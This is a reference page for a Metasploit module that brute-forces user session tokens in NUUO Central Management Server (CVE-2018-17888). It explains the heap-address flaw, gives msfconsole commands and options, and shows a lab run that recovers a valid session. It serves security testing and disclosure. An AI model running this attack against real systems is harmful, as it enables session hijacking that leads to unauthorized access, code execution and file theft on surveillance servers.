Nuuo Central Management Server User Session Token Bruteforce - Metasploit
This page contains detailed information about how to use the auxiliary/gather/nuuo_cms_bruteforce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Nuuo Central Management Server User Session Token Bruteforce
Module: auxiliary/gather/nuuo_cms_bruteforce
Source code: modules/auxiliary/gather/nuuo_cms_bruteforce.rb
Disclosure date: 2018-10-11
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 5180
List of CVEs: CVE-2018-17888
Nuuo Central Management Server below version 2.4 has a flaw where it sends the heap address of the user object instead of a real session number when a user logs in. This can be used to reduce the keyspace for the session number from 10 million to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries. This module does exactly that - it uses a computed occurence table to try the most common combinations up to 1.2 million to try to guess a valid user session. This session number can then be used to achieve code execution or download files - see the other Nuuo CMS auxiliary and exploit modules. Note that for this to work a user has to be logged into the system.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/nuuo_cms_bruteforce
msf auxiliary(nuuo_cms_bruteforce) > show targets
... a list of targets ...
msf auxiliary(nuuo_cms_bruteforce) > set TARGET target-id
msf auxiliary(nuuo_cms_bruteforce) > show options
... show and set options ...
msf auxiliary(nuuo_cms_bruteforce) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Nuuo CMS Session Bruteforce
The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
.text:00454E80 000 push 0FFFFFFFFh
.text:00454E82 004 push offset loc_5E2013
.text:00454E87 008 mov eax, large fs:0
.text:00454E8D 008 push eax
.text:00454E8E 00C sub esp, 8
.text:00454E91 014 push ebp
.text:00454E92 018 push esi
.text:00454E93 01C push edi
.text:00454E94 020 mov eax, dword_68D134
.text:00454E99 020 xor eax, esp
.text:00454E9B 020 push eax
.text:00454E9C 024 lea eax, [esp+24h+var_C]
.text:00454EA0 024 mov large fs:0, eax
.text:00454EA6 024 mov ebp, ecx
.text:00454EA8 024 lea edi, [ebp+43Ch]
.text:00454EAE 024 push edi ; lpCriticalSection_EnterCriticalSection
.text:00454EAF 028 mov [esp+28h+var_10], edi
.text:00454EB3 028 call ds:EnterCriticalSection
.text:00454EB9 024 push 1B8h ; unsigned int
.text:00454EBE 028 mov [esp+28h+var_4], 0
.text:00454EC6 028 call ??2@YAPAXI@Z ; new() operator, returns object in eax
(...)
After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
NUCM/1.0 200 OK
User-Valid: %d
Server-Version: %s
Ini-Version: %d
License-Number: %d
User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
These session numbers (tokens) are not that easy to predict, however after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed between in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received.
NUUO Central Management Server (CMS): all versions below 2.4.0
- 1.5.2 OK
- 2.1.0 OK
- 2.3.0 OK
Scenarios
Tested on Windows 10 Pro x64 running NCS Server v2.1.0
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
[*] 172.22.222.200:5180 - Generating 2621440 session tokens
[+] 172.22.222.200:5180 - Found valid user session: 42094216
[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) >
Go back to menu.
Msfconsole Usage
Here is how the gather/nuuo_cms_bruteforce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/nuuo_cms_bruteforce
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show info
Name: Nuuo Central Management Server User Session Token Bruteforce
Module: auxiliary/gather/nuuo_cms_bruteforce
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-10-11
Provided by:
Pedro Ribeiro <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
NCSPASS no Password for NCSUSER
NCSSESSION no Session number of logged in user
NCSUSER admin no NUUO Central Management System username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5180 yes The target port
Description:
Nuuo Central Management Server below version 2.4 has a flaw where it
sends the heap address of the user object instead of a real session
number when a user logs in. This can be used to reduce the keyspace
for the session number from 10 million to 1.2 million, and with a
bit of analysis it can be guessed in less than 500k tries. This
module does exactly that - it uses a computed occurence table to try
the most common combinations up to 1.2 million to try to guess a
valid user session. This session number can then be used to achieve
code execution or download files - see the other Nuuo CMS auxiliary
and exploit modules. Note that for this to work a user has to be
logged into the system.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-17888
https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
https://seclists.org/fulldisclosure/2019/Jan/51
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
Module Options
This is a complete list of options available in the gather/nuuo_cms_bruteforce auxiliary module:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show options
Module options (auxiliary/gather/nuuo_cms_bruteforce):
Name Current Setting Required Description
---- --------------- -------- -----------
NCSPASS no Password for NCSUSER
NCSSESSION no Session number of logged in user
NCSUSER admin no NUUO Central Management System username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5180 yes The target port
Advanced Options
Here is a complete list of advanced options supported by the gather/nuuo_cms_bruteforce auxiliary module:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show advanced
Module advanced options (auxiliary/gather/nuuo_cms_bruteforce):
Name Current Setting Required Description
---- --------------- -------- -----------
NCSBRUTEAPI false no Bruteforce Version header used during login
NCSTRACE false no Show NCS requests and responses
NCSVERSION no Version header used during login
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/nuuo_cms_bruteforce module can do:
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/nuuo_cms_bruteforce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/nuuo_cms_bruteforce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to bruteforce, trying with the less likely numbers as a last resort...
Here is a relevant code snippet related to the "Failed to bruteforce, trying with the less likely numbers as a last resort..." error message:
142: print_status('Bruteforcing session - this might take a while, go get some coffee!')
143: session = nil
144: time = Benchmark.realtime {
145: session = session_bruteforce_list(WEIGHTED_ARRAY_7)
146: unless session
147: print_error('Failed to bruteforce, trying with the less likely numbers as a last resort...')
148: session = session_bruteforce_list(WEIGHTED_ARRAY_6)
149: end
150: }
151: unless session
152: fail_with(Failure::Unknown, 'Failed to bruteforce user session.')
Failed to bruteforce user session.
Here is a relevant code snippet related to the "Failed to bruteforce user session." error message:
147: print_error('Failed to bruteforce, trying with the less likely numbers as a last resort...')
148: session = session_bruteforce_list(WEIGHTED_ARRAY_6)
149: end
150: }
151: unless session
152: fail_with(Failure::Unknown, 'Failed to bruteforce user session.')
153: else
154: print_good("Found valid user session: #{session}")
155: print_status("Time taken: #{time} seconds; total tries #{@counter}")
156: end
157: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11765 Merged Pull Request: Update NUUO mixin, move code to Rex
- #11291 Merged Pull Request: Add Nuuo CMS session bruteforcing module
References
- CVE-2018-17888
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
- https://seclists.org/fulldisclosure/2019/Jan/51
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/nuuo_nvrmini_reset
- auxiliary/gather/nuuo_cms_file_download
- exploit/linux/http/nuuo_nvrmini_auth_rce
- exploit/linux/http/nuuo_nvrmini_unauth_rce
- exploit/multi/http/nuuo_nvrmini_upgrade_rce
- exploit/windows/nuuo/nuuo_cms_fu
- exploit/windows/nuuo/nuuo_cms_sqli
- auxiliary/gather/citrix_published_bruteforce
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/typo3_bruteforce
- auxiliary/scanner/http/caidao_bruteforce_login
- auxiliary/scanner/http/joomla_bruteforce_login
- post/multi/gather/dns_bruteforce
- auxiliary/admin/sunrpc/solaris_kcms_readfile
- auxiliary/scanner/http/ektron_cms400net
- auxiliary/scanner/http/vcms_login
Authors
- Pedro Ribeiro <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.